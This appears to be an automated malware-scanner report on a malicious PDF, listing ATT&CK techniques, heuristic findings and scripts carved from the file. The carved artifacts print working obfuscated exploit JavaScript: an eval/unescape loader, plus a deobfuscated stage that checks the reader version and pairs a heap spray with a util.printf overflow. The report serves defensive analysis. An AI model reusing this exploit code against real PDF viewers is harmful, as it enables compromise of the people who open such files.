MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The PDF file contains embedded JavaScript that is obfuscated and designed to exploit vulnerabilities in PDF viewers. The script utilizes functions like unescape, String.fromCharCode, and util.printf, indicating an attempt to execute arbitrary code. The ML classifier also flagged this PDF as highly malicious. The primary script attempts to download and execute a second-stage payload, which is a common technique for malware delivery.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 5
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Encrypted PDF carries /JavaScript — payload hidden from static analysis high PDF_ENCRYPTED_WITH_JSPDF declares /Encrypt and also references an executable trigger (/JavaScript). Document encryption hides the JavaScript body and stream contents from static scanners — combined with auto-execution indicators this is a known evasion pattern used to deliver weaponised JavaScript that the analyst cannot inspect without the decryption key.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0017_000.js |
pdf-javascript-stream | PDF /JS object 17 at offset 0x410F | 134 bytes |
SHA-256: a84216a6a196d23cde2c0ad3a79cee34311530435c6aa9374714ea7d2a19d0e5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
eval(""+''+unescape(this.getField("data").value.replace(new RegExp("\\"+String.fromCharCode(124,65),"g"),String.fromCharCode(37))));
|
|||
legacy_pdfkit_stage_000.js |
deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x10C6 | 995 bytes |
SHA-256: a6938e522009382a5f73ef30a45ce3382332361818a2c338c945cc4be3188f4a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var vv = app.viewerVersion.toString().replace(/\D/g, "");
var vs = new Array();
vs[0] = vv.charAt(0)?vv.charAt(0):0;
vs[1] = vv.charAt(1)?vv.charAt(1):0;
vs[2] = vv.charAt(2)?vv.charAt(2):0;
var vva = (vs[0] < 7);
var vvb = (vs[0] == 7 && vs[1] < 1);
var vvc = (vs[0] == 8 && vs[1] <= 1 && vs[2] <= 2);
if(vva || vvb || vvc) {
var sccs = unescape(this.getField("text").value.replace(new RegExp("\\"+String.fromCharCode(124,65), "g"), String.fromCharCode(37)));
var bgbl = unescape("%u0A0A"+"%u0A0A");
var slspc = 20 + sccs.length;
while(bgbl.length < slspc) bgbl += bgbl;
var fblk = bgbl.substring(0,slspc);
var blk = bgbl.substring(0,bgbl.length - slspc);
while(blk.length + slspc < 0x60000) blk = blk + blk + fblk;
var mmy = new Array();
for(i = 0; i < 1200; i++){ mmy[i] = blk + sccs }
var nm = 12;
for(i=0;i<18;i++){ nm = nm + "9"; }
for(i=0;i<276;i++){ nm = nm + "8"; }
util.printf(unescape(""+"%"+"254%"+"35000f"), nm);
}
this.closeDoc(true);
|
|||
javascript_obj0021_000.js |
pdf-javascript-stream | PDF /JS object 21 at offset 0x177C | 134 bytes |
SHA-256: 3d7f5c4248fade4a0f7ca93c07aa91d178d83e902ca746c2bdc5ee022cbb0337 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ϖ<� � ���4!VP�G�^��hV�-F��� ~y��J�<� �uU�5~_ &� ɦ
� Q�� �&� �!{#r�ZW�*2A�$�:;r�m���@늰��\ ��G�
���$ԑ���Y&�x��� ��ԓ !� ą �"f�Y
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.